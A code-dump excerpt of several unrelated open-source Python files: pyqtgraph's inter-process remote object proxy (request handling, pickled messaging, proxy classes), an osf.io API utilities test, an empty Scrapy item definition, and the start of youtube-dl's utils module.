Returns the number of events processed.
"""
if self.exited:
self.debugMsg(' processRequests: exited already; raise ClosedError.')
raise ClosedError()
numProcessed = 0
while self.conn.poll():
try:
self.handleRequest()
numProcessed += 1
except ClosedError:
self.debugMsg('processRequests: got ClosedError from handleRequest; setting exited=True.')
self.exited = True
raise
#except IOError as err: ## let handleRequest take care of this.
#self.debugMsg(' got IOError from handleRequest; try again.')
#if err.errno == 4: ## interrupted system call; try again
#continue
#else:
#raise
except:
print("Error in process %s" % self.name)
sys.excepthook(*sys.exc_info())
if numProcessed > 0:
self.debugMsg('processRequests: finished %d requests' % numProcessed)
return numProcessed
def handleRequest(self):
"""Handle a single request from the remote process.
Blocks until a request is available."""
result = None
while True:
try:
## args, kwds are double-pickled to ensure this recv() call never fails
cmd, reqId, nByteMsgs, optStr = self.conn.recv()
break
except EOFError:
self.debugMsg(' handleRequest: got EOFError from recv; raise ClosedError.')
## remote process has shut down; end event loop
raise ClosedError()
except IOError as err:
if err.errno == 4: ## interrupted system call; try again
self.debugMsg(' handleRequest: got IOError 4 from recv; try again.')
continue
else:
self.debugMsg(' handleRequest: got IOError %d from recv (%s); raise ClosedError.' % (err.errno, err.strerror))
raise ClosedError()
self.debugMsg(" handleRequest: received %s %s" % (str(cmd), str(reqId)))
## read byte messages following the main request
byteData = []
if nByteMsgs > 0:
self.debugMsg(" handleRequest: reading %d byte messages" % nByteMsgs)
for i in range(nByteMsgs):
while True:
try:
byteData.append(self.conn.recv_bytes())
break
except EOFError:
self.debugMsg(" handleRequest: got EOF while reading byte messages; raise ClosedError.")
raise ClosedError()
except IOError as err:
if err.errno == 4:
self.debugMsg(" handleRequest: got IOError 4 while reading byte messages; try again.")
continue
else:
self.debugMsg(" handleRequest: got IOError while reading byte messages; raise ClosedError.")
raise ClosedError()
try:
if cmd == 'result' or cmd == 'error':
resultId = reqId
reqId = None ## prevents attempt to return information from this request
## (this is already a return from a previous request)
opts = pickle.loads(optStr)
self.debugMsg(" handleRequest: id=%s opts=%s" % (str(reqId), str(opts)))
#print os.getpid(), "received request:", cmd, reqId, opts
returnType = opts.get('returnType', 'auto')
if cmd == 'result':
self.results[resultId] = ('result', opts['result'])
elif cmd == 'error':
self.results[resultId] = ('error', (opts['exception'], opts['excString']))
elif cmd == 'getObjAttr':
result = getattr(opts['obj'], opts['attr'])
elif cmd == 'callObj':
obj = opts['obj']
fnargs = opts['args']
fnkwds = opts['kwds']
## If arrays were sent as byte messages, they must be re-inserted into the
## arguments
if len(byteData) > 0:
for i,arg in enumerate(fnargs):
if isinstance(arg, tuple) and len(arg) > 0 and arg[0] == '__byte_message__':
ind = arg[1]
dtype, shape = arg[2]
fnargs[i] = np.fromstring(byteData[ind], dtype=dtype).reshape(shape)
for k,arg in fnkwds.items():
if isinstance(arg, tuple) and len(arg) > 0 and arg[0] == '__byte_message__':
ind = arg[1]
dtype, shape = arg[2]
fnkwds[k] = np.fromstring(byteData[ind], dtype=dtype).reshape(shape)
if len(fnkwds) == 0: ## need to do this because some functions do not allow keyword arguments.
try:
result = obj(*fnargs)
except:
print("Failed to call object %s: %d, %s" % (obj, len(fnargs), fnargs[1:]))
raise
else:
result = obj(*fnargs, **fnkwds)
elif cmd == 'getObjValue':
result = opts['obj'] ## has already been unpickled into its local value
returnType = 'value'
elif cmd == 'transfer':
result = opts['obj']
returnType = 'proxy'
elif cmd == 'transferArray':
## read array data from next message:
result = np.fromstring(byteData[0], dtype=opts['dtype']).reshape(opts['shape'])
returnType = 'proxy'
elif cmd == 'import':
name = opts['module']
fromlist = opts.get('fromlist', [])
mod = builtins.__import__(name, fromlist=fromlist)
if len(fromlist) == 0:
parts = name.lstrip('.').split('.')
result = mod
for part in parts[1:]:
result = getattr(result, part)
else:
result = map(mod.__getattr__, fromlist)
elif cmd == 'del':
LocalObjectProxy.releaseProxyId(opts['proxyId'])
#del self.proxiedObjects[opts['objId']]
elif cmd == 'close':
if reqId is not None:
result = True
returnType = 'value'
exc = None
except:
exc = sys.exc_info()
if reqId is not None:
if exc is None:
self.debugMsg(" handleRequest: sending return value for %d: %s" % (reqId, str(result)))
#print "returnValue:", returnValue, result
if returnType == 'auto':
result = self.autoProxy(result, self.proxyOptions['noProxyTypes'])
elif returnType == 'proxy':
result = LocalObjectProxy(result)
try:
self.replyResult(reqId, result)
except:
sys.excepthook(*sys.exc_info())
self.replyError(reqId, *sys.exc_info())
else:
self.debugMsg(" handleRequest: returning exception for %d" % reqId)
self.replyError(reqId, *exc)
elif exc is not None:
sys.excepthook(*exc)
if cmd == 'close':
if opts.get('noCleanup', False) is True:
os._exit(0) ## exit immediately, do not pass GO, do not collect $200.
## (more importantly, do not call any code that would
## normally be invoked at exit)
else:
raise ClosedError()
def replyResult(self, reqId, result):
self.send(request='result', reqId=reqId, callSync='off', opts=dict(result=result))
def replyError(self, reqId, *exc):
print("error: %s %s %s" % (self.name, str(reqId), str(exc[1])))
excStr = traceback.format_exception(*exc)
try:
self.send(request='error', reqId=reqId, callSync='off', opts=dict(exception=exc[1], excString=excStr))
except:
self.send(request='error', reqId=reqId, callSync='off', opts=dict(exception=None, excString=excStr))
def send(self, request, opts=None, reqId=None, callSync='sync', timeout=10, returnType=None, byteData=None, **kwds):
"""Send a request or return packet to the remote process.
Generally it is not necessary to call this method directly; it is for internal use.
(The docstring has information that is nevertheless useful to the programmer
as it describes the internal protocol used to communicate between processes)
============== ====================================================================
**Arguments:**
request String describing the type of request being sent (see below)
reqId Integer uniquely linking a result back to the request that generated
it. (most requests leave this blank)
callSync 'sync': return the actual result of the request
'async': return a Request object which can be used to look up the
result later
'off': return no result
timeout Time in seconds to wait for a response when callSync=='sync'
opts Extra arguments sent to the remote process that determine the way
the request will be handled (see below)
returnType 'proxy', 'value', or 'auto'
byteData If specified, this is a list of objects to be sent as byte messages
to the remote process.
This is used to send large arrays without the cost of pickling.
============== ====================================================================
Description of request strings and options allowed for each:
============= ============= ========================================================
request option description
------------- ------------- --------------------------------------------------------
getObjAttr Request the remote process return (proxy to) an
attribute of an object.
obj reference to object whose attribute should be
returned
attr string name of attribute to return
returnValue bool or 'auto' indicating whether to return a proxy or
the actual value.
callObj Request the remote process call a function or
method. If a request ID is given, then the call's
return value will be sent back (or information
about the error that occurred while running the
function)
obj the (reference to) object to call
args tuple of arguments to pass to callable
kwds dict of keyword arguments to pass to callable
returnValue bool or 'auto' indicating whether to return a proxy or
the actual value.
getObjValue Request the remote process return the value of
a proxied object (must be picklable)
obj reference to object whose value should be returned
transfer Copy an object to the remote process and request
it return a proxy for the new object.
obj The object to transfer.
import Request the remote process import new symbols
and return proxy(ies) to the imported objects
module the string name of the module to import
fromlist optional list of string names to import from module
del Inform the remote process that a proxy has been
released (thus the remote process may be able to
release the original object)
proxyId id of proxy which is no longer referenced by
remote host
close Instruct the remote process to stop its event loop
and exit. Optionally, this request may return a
confirmation.
result Inform the remote process that its request has
been processed
result return value of a request
error Inform the remote process that its request failed
exception the Exception that was raised (or None if the
exception could not be pickled)
excString string-formatted version of the exception and
traceback
============= =====================================================================
"""
#if len(kwds) > 0:
#print "Warning: send() ignored args:", kwds
if opts is None:
opts = {}
assert callSync in ['off', 'sync', 'async'], 'callSync must be one of "off", "sync", or "async"'
if reqId is None:
if callSync != 'off': ## requested return value; use the next available request ID
reqId = self.nextRequestId
self.nextRequestId += 1
else:
## If requestId is provided, this _must_ be a response to a previously received request.
assert request in ['result', 'error']
if returnType is not None:
opts['returnType'] = returnType
#print os.getpid(), "send request:", request, reqId, opts
## double-pickle args to ensure that at least status and request ID get through
try:
optStr = pickle.dumps(opts)
except:
print("==== Error pickling this object: ====")
print(opts)
print("=======================================")
raise
nByteMsgs = 0
if byteData is not None:
nByteMsgs = len(byteData)
## Send primary request
request = (request, reqId, nByteMsgs, optStr)
self.debugMsg('send request: cmd=%s nByteMsgs=%d id=%s opts=%s' % (str(request[0]), nByteMsgs, str(reqId), str(opts)))
self.conn.send(request)
## follow up by sending byte messages
if byteData is not None:
for obj in byteData: ## Remote process _must_ be prepared to read the same number of byte messages!
self.conn.send_bytes(obj)
self.debugMsg(' sent %d byte messages' % len(byteData))
self.debugMsg(' call sync: %s' % callSync)
if callSync == 'off':
return
req = Request(self, reqId, description=str(request), timeout=timeout)
if callSync == 'async':
return req
if callSync == 'sync':
try:
return req.result()
except NoResultError:
return req
def close(self, callSync='off', noCleanup=False, **kwds):
self.send(request='close', opts=dict(noCleanup=noCleanup), callSync=callSync, **kwds)
def getResult(self, reqId):
## raises NoResultError if the result is not available yet
#print self.results.keys(), os.getpid()
if reqId not in self.results:
try:
self.processRequests()
except ClosedError: ## even if remote connection has closed, we may have
## received new data during this call to processRequests()
pass
if reqId not in self.results:
raise NoResultError()
status, result = self.results.pop(reqId)
if status == 'result':
return result
elif status == 'error':
#print ''.join(result)
exc, excStr = result
if exc is not None:
print("===== Remote process raised exception on request: =====")
print(''.join(excStr))
print("===== Local Traceback to request follows: =====")
raise exc
else:
print(''.join(excStr))
raise Exception("Error getting result. See above for exception from remote process.")
else:
raise Exception("Internal error.")
def _import(self, mod, **kwds):
"""
Request the remote process import a module (or symbols from a module)
and return the proxied results. Uses built-in __import__() function, but
adds a bit more processing:
_import('module') => returns module
_import('module.submodule') => returns submodule
(note this differs from behavior of __import__)
_import('module', fromlist=[name1, name2, ...]) => returns [module.name1, module.name2, ...]
(this also differs from behavior of __import__)
"""
return self.send(request='import', callSync='sync', opts=dict(module=mod), **kwds)
def getObjAttr(self, obj, attr, **kwds):
return self.send(request='getObjAttr', opts=dict(obj=obj, attr=attr), **kwds)
def getObjValue(self, obj, **kwds):
return self.send(request='getObjValue', opts=dict(obj=obj), **kwds)
def callObj(self, obj, args, kwds, **opts):
opts = opts.copy()
args = list(args)
## Decide whether to send arguments by value or by proxy
noProxyTypes = opts.pop('noProxyTypes', None)
if noProxyTypes is None:
noProxyTypes = self.proxyOptions['noProxyTypes']
autoProxy = opts.pop('autoProxy', self.proxyOptions['autoProxy'])
if autoProxy is True:
args = [self.autoProxy(v, noProxyTypes) for v in args]
for k, v in kwds.iteritems():
opts[k] = self.autoProxy(v, noProxyTypes)
byteMsgs = []
## If there are arrays in the arguments, send those as byte messages.
## We do this because pickling arrays is too expensive.
for i,arg in enumerate(args):
if arg.__class__ == np.ndarray:
args[i] = ("__byte_message__", len(byteMsgs), (arg.dtype, arg.shape))
byteMsgs.append(arg)
for k,v in kwds.items():
if v.__class__ == np.ndarray:
kwds[k] = ("__byte_message__", len(byteMsgs), (v.dtype, v.shape))
byteMsgs.append(v)
return self.send(request='callObj', opts=dict(obj=obj, args=args, kwds=kwds), byteData=byteMsgs, **opts)
def registerProxy(self, proxy):
ref = weakref.ref(proxy, self.deleteProxy)
self.proxies[ref] = proxy._proxyId
def deleteProxy(self, ref):
proxyId = self.proxies.pop(ref)
try:
self.send(request='del', opts=dict(proxyId=proxyId), callSync='off')
except IOError: ## if remote process has closed down, there is no need to send delete requests anymore
pass
def transfer(self, obj, **kwds):
"""
Transfer an object by value to the remote host (the object must be picklable)
and return a proxy for the new remote object.
"""
if obj.__class__ is np.ndarray:
opts = {'dtype': obj.dtype, 'shape': obj.shape}
return self.send(request='transferArray', opts=opts, byteData=[obj], **kwds)
else:
return self.send(request='transfer', opts=dict(obj=obj), **kwds)
def autoProxy(self, obj, noProxyTypes):
## Return object wrapped in LocalObjectProxy _unless_ its type is in noProxyTypes.
for typ in noProxyTypes:
if isinstance(obj, typ):
return obj
return LocalObjectProxy(obj)
class Request(object):
"""
Request objects are returned when calling an ObjectProxy in asynchronous mode
or if a synchronous call has timed out. Use hasResult() to ask whether
the result of the call has been returned yet. Use result() to get
the returned value.
"""
def __init__(self, process, reqId, description=None, timeout=10):
self.proc = process
self.description = description
self.reqId = reqId
self.gotResult = False
self._result = None
self.timeout = timeout
def result(self, block=True, timeout=None):
"""
Return the result for this request.
If block is True, wait until the result has arrived or *timeout* seconds passes.
If the timeout is reached, raise NoResultError. (use timeout=None to disable)
If block is False, raise NoResultError immediately if the result has not arrived yet.
If the process's connection has closed before the result arrives, raise ClosedError.
"""
if self.gotResult:
return self._result
if timeout is None:
timeout = self.timeout
if block:
start = time.time()
while not self.hasResult():
if self.proc.exited:
raise ClosedError()
time.sleep(0.005)
if timeout >= 0 and time.time() - start > timeout:
print("Request timed out: %s" % self.description)
import traceback
traceback.print_stack()
raise NoResultError()
return self._result
else:
self._result = self.proc.getResult(self.reqId) ## raises NoResultError if result is not available yet
self.gotResult = True
return self._result
def hasResult(self):
"""Returns True if the result for this request has arrived."""
try:
self.result(block=False)
except NoResultError:
pass
return self.gotResult
class LocalObjectProxy(object):
"""
Used for wrapping local objects to ensure that they are send by proxy to a remote host.
Note that 'proxy' is just a shorter alias for LocalObjectProxy.
For example::
data = [1,2,3,4,5]
remotePlot.plot(data) ## by default, lists are pickled and sent by value
remotePlot.plot(proxy(data)) ## force the object to be sent by proxy
"""
nextProxyId = 0
proxiedObjects = {} ## maps {proxyId: object}
@classmethod
def registerObject(cls, obj):
## assign it a unique ID so we can keep a reference to the local object
pid = cls.nextProxyId
cls.nextProxyId += 1
cls.proxiedObjects[pid] = obj
#print "register:", cls.proxiedObjects
return pid
@classmethod
def lookupProxyId(cls, pid):
return cls.proxiedObjects[pid]
@classmethod
def releaseProxyId(cls, pid):
del cls.proxiedObjects[pid]
#print "release:", cls.proxiedObjects
def __init__(self, obj, **opts):
"""
Create a 'local' proxy object that, when sent to a remote host,
will appear as a normal ObjectProxy to *obj*.
Any extra keyword arguments are passed to proxy._setProxyOptions()
on the remote side.
"""
self.processId = os.getpid()
#self.objectId = id(obj)
self.typeStr = repr(obj)
#self.handler = handler
self.obj = obj
self.opts = opts
def __reduce__(self):
## a proxy is being pickled and sent to a remote process.
## every time this happens, a new proxy will be generated in the remote process,
## so we keep a new ID so we can track when each is released.
pid = LocalObjectProxy.registerObject(self.obj)
return (unpickleObjectProxy, (self.processId, pid, self.typeStr, None, self.opts))
## alias
proxy = LocalObjectProxy
def unpickleObjectProxy(processId, proxyId, typeStr, attributes=None, opts=None):
if processId == os.getpid():
obj = LocalObjectProxy.lookupProxyId(proxyId)
if attributes is not None:
for attr in attributes:
obj = getattr(obj, attr)
return obj
else:
proxy = ObjectProxy(processId, proxyId=proxyId, typeStr=typeStr)
if opts is not None:
proxy._setProxyOptions(**opts)
return proxy
class ObjectProxy(object):
"""
Proxy to an object stored by the remote process. Proxies are created
by calling Process._import(), Process.transfer(), or by requesting/calling
attributes on existing proxy objects.
For the most part, this object can be used exactly as if it
were a local object::
rsys = proc._import('sys') # returns proxy to sys module on remote process
rsys.stdout # proxy to remote sys.stdout
rsys.stdout.write # proxy to remote sys.stdout.write
rsys.stdout.write('hello') # calls sys.stdout.write('hello') on remote machine
# and returns the result (None)
When calling a proxy to a remote function, the call can be made synchronous
(result of call is returned immediately), asynchronous (result is returned later),
or return can be disabled entirely::
ros = proc._import('os')
## synchronous call; result is returned immediately
pid = ros.getpid()
## asynchronous call
request = ros.getpid(_callSync='async')
while not request.hasResult():
time.sleep(0.01)
pid = request.result()
## disable return when we know it isn't needed
rsys.stdout.write('hello', _callSync='off')
Additionally, values returned from a remote function call are automatically
returned either by value (must be picklable) or by proxy.
This behavior can be forced::
rnp = proc._import('numpy')
arrProxy = rnp.array([1,2,3,4], _returnType='proxy')
arrValue = rnp.array([1,2,3,4], _returnType='value')
The default callSync and returnType behaviors (as well as others) can be set
for each proxy individually using ObjectProxy._setProxyOptions() or globally using
proc.setProxyOptions().
"""
def __init__(self, processId, proxyId, typeStr='', parent=None):
object.__init__(self)
## can't set attributes directly because setattr is overridden.
self.__dict__['_processId'] = processId
self.__dict__['_typeStr'] = typeStr
self.__dict__['_proxyId'] = proxyId
self.__dict__['_attributes'] = ()
## attributes that affect the behavior of the proxy.
## in all cases, a value of None causes the proxy to ask
## its parent event handler to make the decision
self.__dict__['_proxyOptions'] = {
'callSync': None, ## 'sync', 'async', None
'timeout': None, ## float, None
'returnType': None, ## 'proxy', 'value', 'auto', None
'deferGetattr': None, ## True, False, None
'noProxyTypes': None, ## list of types to send by value instead of by proxy
}
self.__dict__['_handler'] = RemoteEventHandler.getHandler(processId)
self.__dict__['_handler'].registerProxy(self) ## handler will watch proxy; inform remote process when the proxy is deleted.
def _setProxyOptions(self, **kwds):
"""
Change the behavior of this proxy. For all options, a value of None
will cause the proxy to instead use the default behavior defined
by its parent Process.
Options are:
============= =============================================================
callSync 'sync', 'async', 'off', or None.
If 'async', then calling methods will return a Request object
which can be used to inquire later about the result of the
method call.
If 'sync', then calling a method
will block until the remote process has returned its result
or the timeout has elapsed (in this case, a Request object
is returned instead).
If 'off', then the remote process is instructed _not_ to
reply and the method call will return None immediately.
returnType 'auto', 'proxy', 'value', or None.
If 'proxy', then the value returned when calling a method
will be a proxy to the object on the remote process.
If 'value', then attempt to pickle the returned object and
send it back.
If 'auto', then the decision is made by consulting the
'noProxyTypes' option.
autoProxy bool or None. If True, arguments to __call__ are
automatically converted to proxy unless their type is
listed in noProxyTypes (see below). If False, arguments
are left untouched. Use proxy(obj) to manually convert
arguments before sending.
timeout float or None. Length of time to wait during synchronous
requests before returning a Request object instead.
deferGetattr True, False, or None.
If False, all attribute requests will be sent to the remote
process immediately and will block until a response is
received (or timeout has elapsed).
If True, requesting an attribute from the proxy returns a
new proxy immediately. The remote process is _not_ contacted
to make this request. This is faster, but it is possible to
request an attribute that does not exist on the proxied
object. In this case, AttributeError will not be raised
until an attempt is made to look up the attribute on the
remote process.
noProxyTypes List of object types that should _not_ be proxied when
sent to the remote process.
============= =============================================================
"""
self._proxyOptions.update(kwds)
def _getValue(self):
"""
Return the value of the proxied object
(the remote object must be picklable)
"""
return self._handler.getObjValue(self)
def _getProxyOption(self, opt):
val = self._proxyOptions[opt]
if val is None:
return self._handler.getProxyOption(opt)
return val
def _getProxyOptions(self):
return dict([(k, self._getProxyOption(k)) for k in self._proxyOptions])
def __reduce__(self):
return (unpickleObjectProxy, (self._processId, self._proxyId, self._typeStr, self._attributes))
def __repr__(self):
#objRepr = self.__getattr__('__repr__')(callSync='value')
return "<ObjectProxy for process %d, object 0x%x: %s >" % (self._processId, self._proxyId, self._typeStr)
def __getattr__(self, attr, **kwds):
"""
Calls __getattr__ on the remote object and returns the attribute
by value or by proxy depending on the options set (see
ObjectProxy._setProxyOptions and RemoteEventHandler.setProxyOptions)
If the option 'deferGetattr' is True for this proxy, then a new proxy object
is returned _without_ asking the remote object whether the named attribute exists.
This can save time when making multiple chained attribute requests,
but may also defer a possible AttributeError until later, making
them more difficult to debug.
"""
opts = self._getProxyOptions()
for k in opts:
if '_'+k in kwds:
opts[k] = kwds.pop('_'+k)
if opts['deferGetattr'] is True:
return self._deferredAttr(attr)
else:
#opts = self._getProxyOptions()
return self._handler.getObjAttr(self, attr, **opts)
def _deferredAttr(self, attr):
return DeferredObjectProxy(self, attr)
def __call__(self, *args, **kwds):
"""
Attempts to call the proxied object from the remote process.
Accepts extra keyword arguments:
_callSync 'off', 'sync', or 'async'
_returnType 'value', 'proxy', or 'auto'
If the remote call raises an exception on the remote process,
it will be re-raised on the local process.
"""
opts = self._getProxyOptions()
for k in opts:
if '_'+k in kwds:
opts[k] = kwds.pop('_'+k)
return self._handler.callObj(obj=self, args=args, kwds=kwds, **opts)
## Explicitly proxy special methods. Is there a better way to do this??
def _getSpecialAttr(self, attr):
## this just gives us an easy way to change the behavior of the special methods
return self._deferredAttr(attr)
def __getitem__(self, *args):
return self._getSpecialAttr('__getitem__')(*args)
def __setitem__(self, *args):
return self._getSpecialAttr('__setitem__')(*args, _callSync='off')
def __setattr__(self, *args):
return self._getSpecialAttr('__setattr__')(*args, _callSync='off')
def __str__(self, *args):
return self._getSpecialAttr('__str__')(*args, _returnType='value')
def __len__(self, *args):
return self._getSpecialAttr('__len__')(*args)
def __add__(self, *args):
return self._getSpecialAttr('__add__')(*args)
def __sub__(self, *args):
return self._getSpecialAttr('__sub__')(*args)
def __div__(self, *args):
return self._getSpecialAttr('__div__')(*args)
def __truediv__(self, *args):
return self._getSpecialAttr('__truediv__')(*args)
def __floordiv__(self, *args):
return self._getSpecialAttr('__floordiv__')(*args)
def __mul__(self, *args):
return self._getSpecialAttr('__mul__')(*args)
def __pow__(self, *args):
return self._getSpecialAttr('__pow__')(*args)
def __iadd__(self, *args):
return self._getSpecialAttr('__iadd__')(*args, _callSync='off')
def __isub__(self, *args):
return self._getSpecialAttr('__isub__')(*args, _callSync='off')
def __idiv__(self, *args):
return self._getSpecialAttr('__idiv__')(*args, _callSync='off')
def __itruediv__(self, *args):
return self._getSpecialAttr('__itruediv__')(*args, _callSync='off')
def __ifloordiv__(self, *args):
return self._getSpecialAttr('__ifloordiv__')(*args, _callSync='off')
def __imul__(self, *args):
return self._getSpecialAttr('__imul__')(*args, _callSync='off')
def __ipow__(self, *args):
return self._getSpecialAttr('__ipow__')(*args, _callSync='off')
def __rshift__(self, *args):
return self._getSpecialAttr('__rshift__')(*args)
def __lshift__(self, *args):
return self._getSpecialAttr('__lshift__')(*args)
def __irshift__(self, *args):
return self._getSpecialAttr('__irshift__')(*args, _callSync='off')
def __ilshift__(self, *args):
return self._getSpecialAttr('__ilshift__')(*args, _callSync='off')
def __eq__(self, *args):
return self._getSpecialAttr('__eq__')(*args)
def __ne__(self, *args):
return self._getSpecialAttr('__ne__')(*args)
def __lt__(self, *args):
return self._getSpecialAttr('__lt__')(*args)
def __gt__(self, *args):
return self._getSpecialAttr('__gt__')(*args)
def __le__(self, *args):
return self._getSpecialAttr('__le__')(*args)
def __ge__(self, *args):
return self._getSpecialAttr('__ge__')(*args)
def __and__(self, *args):
return self._getSpecialAttr('__and__')(*args)
def __or__(self, *args):
return self._getSpecialAttr('__or__')(*args)
def __xor__(self, *args):
return self._getSpecialAttr('__xor__')(*args)
def __iand__(self, *args):
return self._getSpecialAttr('__iand__')(*args, _callSync='off')
def __ior__(self, *args):
return self._getSpecialAttr('__ior__')(*args, _callSync='off')
def __ixor__(self, *args):
return self._getSpecialAttr('__ixor__')(*args, _callSync='off')
def __mod__(self, *args):
return self._getSpecialAttr('__mod__')(*args)
def __radd__(self, *args):
return self._getSpecialAttr('__radd__')(*args)
def __rsub__(self, *args):
return self._getSpecialAttr('__rsub__')(*args)
def __rdiv__(self, *args):
return self._getSpecialAttr('__rdiv__')(*args)
def __rfloordiv__(self, *args):
return self._getSpecialAttr('__rfloordiv__')(*args)
def __rtruediv__(self, *args):
return self._getSpecialAttr('__rtruediv__')(*args)
def __rmul__(self, *args):
return self._getSpecialAttr('__rmul__')(*args)
def __rpow__(self, *args):
return self._getSpecialAttr('__rpow__')(*args)
def __rrshift__(self, *args):
return self._getSpecialAttr('__rrshift__')(*args)
def __rlshift__(self, *args):
return self._getSpecialAttr('__rlshift__')(*args)
def __rand__(self, *args):
return self._getSpecialAttr('__rand__')(*args)
def __ror__(self, *args):
return self._getSpecialAttr('__ror__')(*args)
def __rxor__(self, *args):
return self._getSpecialAttr('__ror__')(*args)
def __rmod__(self, *args):
return self._getSpecialAttr('__rmod__')(*args)
def __hash__(self):
## Required for python3 since __eq__ is defined.
return id(self)
class DeferredObjectProxy(ObjectProxy):
"""
This class represents an attribute (or sub-attribute) of a proxied object.
It is used to speed up attribute requests. Take the following scenario::
rsys = proc._import('sys')
rsys.stdout.write('hello')
For this simple example, a total of 4 synchronous requests are made to
the remote process:
1) import sys
2) getattr(sys, 'stdout')
3) getattr(stdout, 'write')
4) write('hello')
This takes a lot longer than running the equivalent code locally. To
speed things up, we can 'defer' the two attribute lookups so they are
only carried out when neccessary::
rsys = proc._import('sys')
rsys._setProxyOptions(deferGetattr=True)
rsys.stdout.write('hello')
This example only makes two requests to the remote process; the two
attribute lookups immediately return DeferredObjectProxy instances
immediately without contacting the remote process. When the call
to write() is made, all attribute requests are processed at the same time.
Note that if the attributes requested do not exist on the remote object,
making the call to write() will raise an AttributeError.
"""
def __init__(self, parentProxy, attribute):
## can't set attributes directly because setattr is overridden.
for k in ['_processId', '_typeStr', '_proxyId', '_handler']:
self.__dict__[k] = getattr(parentProxy, k)
self.__dict__['_parent'] = parentProxy ## make sure parent stays alive
self.__dict__['_attributes'] = parentProxy._attributes + (attribute,)
self.__dict__['_proxyOptions'] = parentProxy._proxyOptions.copy()
def __repr__(self):
return ObjectProxy.__repr__(self) + '.' + '.'.join(self._attributes)
def _undefer(self):
"""
Return a non-deferred ObjectProxy referencing the same object
"""
return self._parent.__getattr__(self._attributes[-1], _deferGetattr=False)
|
leb2dg/osf.io
|
refs/heads/develop
|
api_tests/base/test_utils.py
|
6
|
# -*- coding: utf-8 -*-
from nose.tools import * # flake8: noqa
import mock # noqa
import unittest
from rest_framework import fields
from rest_framework.exceptions import ValidationError
from api.base import utils as api_utils
from framework.status import push_status_message
class TestTruthyFalsy:
"""Check that our copy/pasted representation of
TRUTHY and FALSY match the DRF BooleanField's versions
"""
def test_truthy(self):
assert_equal(api_utils.TRUTHY, fields.BooleanField.TRUE_VALUES)
def test_falsy(self):
assert_equal(api_utils.FALSY, fields.BooleanField.FALSE_VALUES)
class TestIsDeprecated(unittest.TestCase):
def setUp(self):
super(TestIsDeprecated, self).setUp()
self.min_version = '2.0'
self.max_version = '2.5'
def test_is_deprecated(self):
request_version = '2.6'
is_deprecated = api_utils.is_deprecated(
request_version, self.min_version, self.max_version)
assert_equal(is_deprecated, True)
def test_is_not_deprecated(self):
request_version = '2.5'
is_deprecated = api_utils.is_deprecated(
request_version, self.min_version, self.max_version)
assert_equal(is_deprecated, False)
class TestFlaskDjangoIntegration:
def test_push_status_message_no_response(self):
status_message = 'This is a message'
statuses = ['info', 'warning', 'warn', 'success', 'danger', 'default']
for status in statuses:
try:
push_status_message(status_message, kind=status)
except BaseException:
assert_true(
False,
'Exception from push_status_message via API v2 with type "{}".'.format(status)
)
def test_push_status_message_expected_error(self):
status_message = 'This is a message'
try:
push_status_message(status_message, kind='error')
assert_true(
False,
'push_status_message() should have generated a ValidationError exception.'
)
except ValidationError as e:
assert_equal(
e.detail[0],
status_message,
'push_status_message() should have passed along the message with the Exception.'
)
except RuntimeError:
assert_true(
False,
'push_status_message() should have caught the runtime error and replaced it.'
)
except BaseException:
assert_true(
False,
'Exception from push_status_message when called from the v2 API with type "error"'
)
@mock.patch('framework.status.session')
def test_push_status_message_unexpected_error(self, mock_sesh):
status_message = 'This is a message'
exception_message = 'this is some very unexpected problem'
mock_get = mock.Mock(side_effect=RuntimeError(exception_message))
mock_data = mock.Mock()
mock_data.attach_mock(mock_get, 'get')
mock_sesh.attach_mock(mock_data, 'data')
try:
push_status_message(status_message, kind='error')
assert_true(
False,
'push_status_message() should have generated a RuntimeError exception.'
)
except ValidationError as e:
assert_true(
False,
'push_status_message() should have re-raised the RuntimeError not gotten ValidationError.'
)
except RuntimeError as e:
assert_equal(getattr(e, 'message', None),
exception_message,
'push_status_message() should have re-raised the '
'original RuntimeError with the original message.')
except BaseException:
assert_true(
False, 'Unexpected Exception from push_status_message when called '
'from the v2 API with type "error"')
|
dcondrey/scrapy-spiders
|
refs/heads/master
|
mandy/mandy/items.py
|
1
|
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
from scrapy.item import Item, Field
class MandyItem(Item):
# define the fields for your item here like:
# name = Field()
pass
|
misterhat/youtube-dl
|
refs/heads/master
|
youtube_dl/utils.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import base64
import binascii
import calendar
import codecs
import contextlib
import ctypes
import datetime
import email.utils
import errno
import functools
import gzip
import io
import itertools
import json
import locale
import math
import operator
import os
import pipes
import platform
import re
import socket
import ssl
import subprocess
import sys
import tempfile
import traceback
import xml.etree.ElementTree
import zlib
from .compat import (
compat_HTMLParser,
compat_basestring,
compat_chr,
compat_etree_fromstring,
compat_html_entities,
compat_html_entities_html5,
compat_http_client,
compat_kwargs,
compat_parse_qs,
compat_shlex_quote,
compat_socket_create_connection,
compat_str,
compat_struct_pack,
compat_urllib_error,
compat_urllib_parse,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urllib_parse_unquote_plus,
compat_urllib_request,
compat_urlparse,
compat_xpath,
)
from .socks import (
ProxyType,
sockssocket,
)
def register_socks_protocols():
# "Register" SOCKS protocols
# In Python < 2.6.5, urlsplit() suffers from bug https://bugs.python.org/issue7904
# URLs with protocols not in urlparse.uses_netloc are not handled correctly
for scheme in ('socks', 'socks4', 'socks4a', 'socks5'):
if scheme not in compat_urlparse.uses_netloc:
compat_urlparse.uses_netloc.append(scheme)
# This is not clearly defined otherwise
compiled_regex_type = type(re.compile(''))
std_headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20150101 Firefox/47.0 (Chrome)',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-us,en;q=0.5',
}
NO_DEFAULT = object()
ENGLISH_MONTH_NAMES = [
'January', 'February', 'March', 'April', 'May', 'June',
'July', 'August', 'September', 'October', 'November', 'December']
KNOWN_EXTENSIONS = (
'mp4', 'm4a', 'm4p', 'm4b', 'm4r', 'm4v', 'aac',
'flv', 'f4v', 'f4a', 'f4b',
'webm', 'ogg', 'ogv', 'oga', 'ogx', 'spx', 'opus',
'mkv', 'mka', 'mk3d',
'avi', 'divx',
'mov',
'asf', 'wmv', 'wma',
'3gp', '3g2',
'mp3',
'flac',
'ape',
'wav',
'f4f', 'f4m', 'm3u8', 'smil')
